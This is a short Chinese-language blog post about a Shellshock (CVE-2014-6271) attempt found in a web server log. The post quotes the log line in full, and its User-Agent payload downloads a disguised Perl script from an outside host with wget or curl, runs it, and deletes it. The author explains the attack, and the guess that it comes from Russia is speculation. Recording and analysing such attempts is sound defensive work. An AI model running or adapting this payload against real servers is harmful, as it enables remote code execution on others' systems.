104.131.118.62 - - [15/Jun/2025:17:18:00 +0800] "GET HTTP/1.1 HTTP/1.1" 400 226 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nZAZAZA\"';system(\"wget -O /tmp/gif.gif http://pjsn.hi2.ro/gif.gif;curl -O /tmp/gif.gif http://pjsn.hi2.ro/gif.gif; lwp-download -a http://pjsn.hi2.ro/gif.gif /tmp/gif.gif;perl /tmp/gif.gif;rm -rf /tmp/gif.gif*;exit\")"
這是一個夾帶在 User-Agent的 Shellshock漏洞攻擊(CVE-2014-6271), 估狗之後發現 10多年前就已經有了, 利用 Shellshock漏洞執行從 http://pjsn.hi2.ro下載不明檔案 gif.gif(這應該是偽裝成圖檔的惡意程式)惡意 Perl指令碼
而這個 http://pjsn.hi2.ro網址是連到俄羅斯, 所以可能是俄羅斯人對原本的 104.131.118.62網站做跳板
沒有留言:
張貼留言